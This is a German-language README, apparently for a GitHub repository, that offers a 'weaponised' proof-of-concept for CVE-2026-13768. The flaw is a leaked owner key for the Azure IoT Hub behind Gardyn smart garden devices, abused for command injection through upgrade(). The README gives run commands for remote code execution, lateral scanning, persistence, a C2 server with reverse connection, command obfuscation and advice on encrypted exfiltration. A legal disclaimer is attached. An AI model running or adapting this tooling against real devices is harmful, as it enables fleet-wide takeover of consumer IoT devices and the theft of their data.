
Azure IoT Hub, bei dem die Offenlegung eines Shared Access Keys auf Besitzerebene eine nicht authentifizierte Remotecodeausführung (RCE) gegen verbundene IoT-Geräte ermöglicht. Proof-Of-Concept
[!WARNING] Dieses Repository enthält einen voll funktionsfähigen Proof-of-Concept für eine IoT-Sicherheitslücke mit hohem Schweregrad.
Dieser Code wird ausschließlich zu Bildungszwecken, für autorisierte Sicherheitsforschung und defensive Tests bereitgestellt.Unbefugte Nutzung ist illegal. Das Testen oder Ausnutzen von Systemen ohne ausdrückliche schriftliche Genehmigung des Eigentümers verstößt gegen den Computer Fraud and Abuse Act (CFAA), das EU Cyber Resilience Act und andere anwendbare Gesetze in Ihrem Land.
Die Autoren übernehmen keine Haftung für Missbrauch, Schäden oder rechtliche Konsequenzen, die aus diesem Code resultieren.
Handeln Sie stets innerhalb rechtlicher und ethischer Grenzen.
CVE-2026-13768 legt die Verbindungszeichenfolge auf Besitzerebene des IoT Hub im Gardyn Smart Garden System offen und ermöglicht so die vollständige administrative Kontrolle über den Azure IoT Hub. Dieser PoC zeigt, wie ein Angreifer mit dem Besitzerschlüssel Remote-Code-Ausführung (RCE) auf verbundenen Geräten durch Befehlsinjektion in der Cloud-zu-Gerät-Methode upgrade() erreichen kann, was eine geräteflottenweite Kompromittierung ermöglicht.
Das Paket enthält:
Dies ist ein lebendiges Forschungsprojekt - nutzen Sie es verantwortungsvoll, um Lieferketten- und IoT-Cloud-Fehlkonfigurationen zu verstehen und sich dagegen zu verteidigen.
upgrade()-Methode injizieren (unter Ausnutzung der Befehlsinjektion CVE-2025-29631).
├── poc.py # Hauptskript für bewaffnete Exploitation
├── validate.py # Sicheres, schreibgeschütztes Validierungstool
├── c2s.py # Leichter C2-Server für Demos
├── TEMPLATES.md # Sofort einsetzbare Befehlsvorlagen.
├── README.md
Klonen Sie das Repository:
git clone https://github.com/J4ck3LSyN-Gen2/CVE-2026-13768.git
cd CVE-2026-13768
python3 -m venv venv
Aktivieren Sie die virtuelle Umgebung (oder erstellen Sie eine):
source venv/bin/activate
python3 -m pip install --upgrade pip
Installieren Sie die Abhängigkeiten.
python3 -m pip install azure-iot-hub
python validate.py --conn-str "HostName=yourhub.azure-devices.net;SharedAccessKeyName=iothubowner;SharedAccessKey=..."
Exit-Code 0 = Gültiger Besitzerschlüssel mit zugänglichen Geräten. Es werden keine Änderungen vorgenommen.
python poc.py \
--mode exploit \
--conn-str "HostName=..." \
--device-id "target-device-123" \
--command "whoami" \
--lateral-scan \
--persist
Führen Sie python poc.py --help für alle Optionen aus.
python c2s.py --port 4444
iothubownerupgrade()Hinweis: Der Code für laterale Bewegung und Persistenz sind illustrative Platzhalter. Passen Sie sie an das Betriebssystem und die Einschränkungen Ihres Zielgeräts an (z. B. BusyBox-begrenzte Umgebungen).
/tmp/cve_2026_13768.log. Ersetzen Sie dies in echten Einsätzen durch eine verschlüsselte Exfiltration.obfuscate_cmd() / deobfuscate_cmd().Beiträge willkommen für:
Bitte erstellen Sie Issues oder Pull Requests.
Mit großer Macht kommt große Verantwortung.
| Argument | Beschreibung | Erforderlich |
|---|
--mode | validate oder exploit | Nein (Standard: validate) |
--conn-str | Verbindungszeichenfolge des IoT Hub-Besitzers | Ja |
--device-id | Zielgeräte-ID | Ja (Exploit-Modus) |
--command | Auszuführender Befehl über upgrade()-Injektion | Nein (Standard: id) |
--lateral-scan | LAN-Aufklärung vom Gerät aus aktivieren | Nein |
--persist | Persistenz versuchen (z. B. cron, systemd) | Nein |
--c2 | Rückverbindung zum C2-Server herstellen | Nein |